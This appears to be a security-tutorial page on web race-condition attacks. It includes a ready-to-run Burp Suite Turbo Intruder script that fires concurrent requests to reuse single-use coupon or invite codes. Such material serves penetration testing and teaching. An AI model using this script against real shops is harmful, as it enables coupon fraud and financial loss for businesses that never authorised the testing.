Web Race Condition Attack
Last modified: 2023-08-14
Race condition is a vulnerability of web applications by concurrent requests to circumvent limiting the state.
If target website has the functionality that logged-in user can apply the 10% off code for buying products, the code must be applied only one time most of the time. However, this rule might be bypassed by exploiting race condition vulnerability with concurrent requests.
We can easily achieve race condition attack by using Turbo Intruder.
In Burp Suite, right-click on specific request.
Select Extensions → Turbo Intruder. If it does not exist, you need to install it in the BApp Store of Burp Suite.
In Turbo Intruder window, set specific value to the
concurrentConnectionparam of the
RequestEnginemethod. This value is up to target website logic. For example, if we need to apply coupon code 20 times in EC site, set
def queueRequests(target, wordlists): engine = RequestEngine( endpoint=target.endpoint, concurrentConnections=20, # change this value for race condition. requestsPerConnection=1, pipeline=False) # For loop requests i = 0 while i < 100: # this value is arbitrary but not very important for this situation. engine.queue(target.req, None) i += 1 def handleResponse(req, interesting): if interesting: table.add(req)
Now click Attack button. Since the request N times at the same time, we may be able to bypass the limit to be applied some code e.g. coupon, invite code, etc.